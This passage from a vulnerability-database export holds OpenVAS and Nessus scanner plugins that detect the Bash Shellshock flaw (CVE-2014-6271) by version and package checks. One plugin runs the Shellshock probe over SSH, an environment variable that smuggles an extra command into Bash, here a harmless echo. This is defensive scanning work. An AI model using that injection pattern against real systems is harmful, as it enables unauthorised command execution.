make_list(\n\t\t\t\"4.0(0)N1(1a)\",\n\t\t\t\"4.0(0)N1(2)\",\n\t\t\t\"4.0(0)N1(2a)\",\n\t\t\t\"4.0(1a)N1(1)\",\n\t\t\t\"4.0(1a)N1(1a)\",\n\t\t\t\"4.0(1a)N2(1)\",\n\t\t\t\"4.0(1a)N2(1a)\",\n\t\t\t\"4.1(3)N1(1)\",\n\t\t\t\"4.1(3)N1(1a)\",\n\t\t\t\"4.1(3)N2(1)\",\n\t\t\t\"4.1(3)N2(1a)\",\n\t\t\t\"4.2(1)N1(1)\",\n\t\t\t\"4.2(1)N2(1)\",\n\t\t\t\"4.2(1)N2(1a)\",\n\t\t\t\"5.0(2)N1(1)\",\n\t\t\t\"5.0(2)N2(1)\",\n\t\t\t\"5.0(2)N2(1a)\",\n\t\t\t\"5.0(3)N1(1c)\",\n\t\t\t\"5.0(3)N2(1)\",\n\t\t\t\"5.0(3)N2(2)\",\n\t\t\t\"5.0(3)N2(2a)\",\n\t\t\t\"5.0(3)N2(2b)\",\n\t\t\t\"5.1(3)N1(1)\",\n\t\t\t\"5.1(3)N1(1a)\",\n\t\t\t\"5.1(3)N2(1)\",\n\t\t\t\"5.1(3)N2(1a)\",\n\t\t\t\"5.1(3)N2(1b)\",\n\t\t\t\"5.1(3)N2(1c)\",\n\t\t\t\"5.2(1)N1(1)\",\n\t\t\t\"5.2(1)N1(1a)\",\n\t\t\t\"5.2(1)N1(1b)\",\n\t\t\t\"5.2(1)N1(2)\",\n\t\t\t\"5.2(1)N1(2a)\",\n\t\t\t\"5.2(1)N1(3)\",\n\t\t\t\"5.2(1)N1(4)\",\n\t\t\t\"5.2(1)N1(5)\",\n\t\t\t\"5.2(1)N1(6)\",\n\t\t\t\"5.2(1)N1(7)\",\n\t\t\t\"5.2(1)N1(8)\",\n\t\t\t\"5.2(1)N1(8a)\",\n\t\t\t\"6.0(2)N1(1)\",\n\t\t\t\"6.0(2)N1(2)\",\n\t\t\t\"6.0(2)N1(2a)\",\n\t\t\t\"6.0(2)N2(1)\",\n\t\t\t\"6.0(2)N2(1b)\",\n\t\t\t\"6.0(2)N2(2)\",\n\t\t\t\"6.0(2)N2(3)\",\n\t\t\t\"6.0(2)N2(4)\",\n\t\t\t\"6.0(2)N2(5)\",\n\t\t\t\"7.0(0)N1(1)\",\n\t\t\t\"7.0(1)N1(1)\",\n\t\t\t\"7.0(2)N1(1)\",\n\t\t\t\"7.0(3)N1(1)\"\n\t\t);\n}\n\nif( nx_model =~ \"^6[0-9]+\" )\n{\n affected = make_list(\n\t\t\t\"6.0(2)N1(2)\",\n\t\t\t\"6.0(2)N1(2a)\",\n\t\t\t\"6.0(2)N2(1)\",\n\t\t\t\"6.0(2)N2(1b)\",\n\t\t\t\"6.0(2)N2(2)\",\n\t\t\t\"6.0(2)N2(3)\",\n\t\t\t\"6.0(2)N2(4)\",\n\t\t\t\"6.0(2)N2(5)\",\n\t\t\t\"7.0(0)N1(1)\",\n\t\t\t\"7.0(1)N1(1)\",\n\t\t\t\"7.0(2)N1(1)\",\n\t\t\t\"7.0(3)N1(1)\"\n\t\t);\n}\n\nif( nx_model =~ \"^7[0-9]+\" )\n{\n affected = make_list(\n\t\t\t\"4.1.(2)\",\n\t\t\t\"4.1.(3)\",\n\t\t\t\"4.1.(4)\",\n\t\t\t\"4.1.(5)\",\n\t\t\t\"4.2(3)\",\n\t\t\t\"4.2(4)\",\n\t\t\t\"4.2(6)\",\n\t\t\t\"4.2(8)\",\n\t\t\t\"4.2.(2a)\",\n\t\t\t\"5.0(2a)\",\n\t\t\t\"5.0(3)\",\n\t\t\t\"5.0(5)\",\n\t\t\t\"5.1(1)\",\n\t\t\t\"5.1(1a)\",\n\t\t\t\"5.1(3)\",\n\t\t\t\"5.1(4)\",\n\t\t\t\"5.1(5)\",\n\t\t\t\"5.1(6)\",\n\t\t\t\"5.2(1)\",\n\t\t\t\"5.2(3a)\",\n\t\t\t\"5.2(4)\",\n\t\t\t\"5.2(5)\",\n\t\t\t\"5.2(7)\",\n\t\t\t\"5.2(9)\",\n\t\t\t\"6.0(1)\",\n\t\t\t\"6.0(2)\",\n\t\t\t\"6.0(3)\",\n\t\t\t\"6.0(4)\",\n\t\t\t\"6.1(1)\",\n\t\t\t\"6.1(2)\",\n\t\t\t\"6.1(3)\",\n\t\t\t\"6.1(4)\",\n\t\t\t\"6.1(4a)\",\n\t\t\t\"6.2(2)\",\n\t\t\t\"6.2(2a)\",\n\t\t\t\"6.2(6)\"\n\t\t);\n}\n\nif( nx_model =~ \"^N9K\" )\n{\n affected = make_list(\n\t\t\t\"11.0(1b)\",\n\t\t\t\"11.0(1c)\",\n\t\t\t\"6.1(2)I2(1)\",\n\t\t\t\"6.1(2)I2(2)\",\n\t\t\t\"6.1(2)I2(2a)\",\n\t\t\t\"6.1(2)I2(2b)\",\n\t\t\t\"6.1(2)I2(3)\"\n\t\t);\n}\n\n\nforeach af ( affected )\n{\n if( version == af )\n {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:27:46", "bulletinFamily": "scanner", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "modified": "2018-11-27T00:00:00", "published": "2014-09-26T00:00:00", "id": "OPENVAS:1361412562310804490", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804490", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804490\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 13:50:37 +0530 (Fri, 26 Sep 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/1207723\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141597\");\n script_xref(name:\"URL\", value:\"https://blogs.akamai.com/2014/09/environment-bashing.html\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3\");\n\n script_tag(name:\"solution\", value:\"Apply the patch or upgrade to latest version.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo 'env x=\"() { :;}; echo CVE-2014-6271 vulnerable\" /bin/bash -c \"echo this is a test\"' | /bin/bash\ncmd = \"echo 'env x=\" + '\"' + '() { :;}; echo CVE-2014-6271 vulnerable\" ' + bash_cmd + ' -c \"echo this is a test\"' + \"' | \" + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"CVE-2014-6271 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:13", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-1293", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123304", "title": "Oracle Linux Local Check: ELSA-2014-1293", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-1293.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123304\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:02:01 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-1293\");\n script_tag(name:\"insight\", value:\"ELSA-2014-1293 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-1293\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-1293.html\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-30T12:37:39", "bulletinFamily": "scanner", "description": "On September 24, 2014, a vulnerability in the Bash shell was publicly announced.\n The vulnerability is related to the way in which shell functions are passed though environment variables.\n The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked.\n The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.\n\n All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined\n by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able\n to execute commands on an affected server. However, in most cases involving Cisco products, authentication is required before exploitation could be attempted.\n\n A number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is a third-party software component\n that is part of the GNU software project and used by a number of software vendors. As of this version of the Security Advisory,\n there have been a number of vulnerabilities recently discovered in the Bash shell, and the investigation is ongoing. For vulnerable products,\n Cisco has included information on the product versions that will contain the fixed software, and the date these versions are expected\n to be published on the cisco.com download page. This advisory will be updated as additional information becomes available.\n Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability.\n This advisory is available at the references.", "modified": "2018-10-29T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310105684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105684", "title": "GNU Bash Environment Variable Command Injection Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ios_xe_cisco-sa-20140926-bash.nasl 12149 2018-10-29 10:48:30Z asteins $\n#\n# GNU Bash Environment Variable Command Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:ios_xe\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105684\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12149 $\");\n\n script_name(\"GNU Bash Environment Variable Command Injection Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAMBAlert.x?alertId=35836\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35880\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35845\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35879\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35860\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35861\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35816\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"On September 24, 2014, a vulnerability in the Bash shell was publicly announced.\n The vulnerability is related to the way in which shell functions are passed though environment variables.\n The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked.\n The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.\n\n All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined\n by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able\n to execute commands on an affected server. However, in most cases involving Cisco products, authentication is required before exploitation could be attempted.\n\n A number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is a third-party software component\n that is part of the GNU software project and used by a number of software vendors. As of this version of the Security Advisory,\n there have been a number of vulnerabilities recently discovered in the Bash shell, and the investigation is ongoing. For vulnerable products,\n Cisco has included information on the product versions that will contain the fixed software, and the date these versions are expected\n to be published on the cisco.com download page. This advisory will be updated as additional information becomes available.\n Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability.\n This advisory is available at the references.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 11:48:30 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 11:04:49 +0200 (Tue, 10 May 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ios_xe_version.nasl\");\n script_mandatory_keys(\"cisco_ios_xe/version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\naffected = make_list(\n\t\t'2.1.0',\n\t\t'2.1.1',\n\t\t'2.1.2',\n\t\t'2.2.1',\n\t\t'2.2.2',\n\t\t'2.2.3',\n\t\t'2.3.0',\n\t\t'2.3.0t',\n\t\t'2.3.1t',\n\t\t'2.3.2',\n\t\t'2.4.0',\n\t\t'2.4.1',\n\t\t'2.5.0',\n\t\t'2.6.0',\n\t\t'2.6.1',\n\t\t'2.6.2',\n\t\t'3.1.0S',\n\t\t'3.1.1S',\n\t\t'3.1.2S',\n\t\t'3.1.3S',\n\t\t'3.1.1SG',\n\t\t'3.2.0S',\n\t\t'3.2.1S',\n\t\t'3.2.2S',\n\t\t'3.2.0SE',\n\t\t'3.2.1SE',\n\t\t'3.2.2SE',\n\t\t'3.2.3SE',\n\t\t'3.2.0SG',\n\t\t'3.2.1SG',\n\t\t'3.2.2SG',\n\t\t'3.2.3SG',\n\t\t'3.2.4SG',\n\t\t'3.2.5SG',\n\t\t'3.2.0XO',\n\t\t'3.2.1XO',\n\t\t'3.3.0S',\n\t\t'3.3.1S',\n\t\t'3.3.2S',\n\t\t'3.3.0SE',\n\t\t'3.3.1SE',\n\t\t'3.3.0SG',\n\t\t'3.3.1SG',\n\t\t'3.3.2SG',\n\t\t'3.3.0XO',\n\t\t'3.4.0S',\n\t\t'3.4.1S',\n\t\t'3.4.2S',\n\t\t'3.4.3S',\n\t\t'3.4.4S',\n\t\t'3.4.5S',\n\t\t'3.4.6S',\n\t\t'3.4.0SG',\n\t\t'3.4.1SG',\n\t\t'3.4.2SG',\n\t\t'3.5.0E',\n\t\t'3.5.0S',\n\t\t'3.5.1S',\n\t\t'3.5.2S',\n\t\t'3.6.0S',\n\t\t'3.6.1S',\n\t\t'3.6.2S',\n\t\t'3.7.0S',\n\t\t'3.7.1S',\n\t\t'3.7.2S',\n\t\t'3.7.3S',\n\t\t'3.7.4S',\n\t\t'3.7.5S',\n\t\t'3.7.6S',\n\t\t'3.8.0S',\n\t\t'3.8.1S',\n\t\t'3.8.2S',\n\t\t'3.9.0S',\n\t\t'3.9.1S',\n\t\t'3.9.2S',\n\t\t'3.10.0S',\n\t\t'3.10.0S',\n\t\t'3.10.1S',\n\t\t'3.10.2S',\n\t\t'3.10.3S',\n\t\t'3.10.4S',\n\t\t'3.11.0S',\n\t\t'3.11.1S',\n\t\t'3.11.2S',\n\t\t'3.12.0S',\n\t\t'3.13.0S' );\n\nforeach af ( affected )\n{\n if( version == af )\n {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:22:26", "bulletinFamily": "scanner", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "modified": "2018-06-27T00:00:00", "id": "SLACKWARE_SSA_2014-267-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77832", "published": "2014-09-25T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-267-01) (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-267-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77832);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"SSA\", value:\"2014-267-01\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-267-01) (Shellshock)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bash packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.522193\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2353de76\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:26", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2014:1293 :\n\nUpdated bash packages that fix one security issue are now available for Red Hat 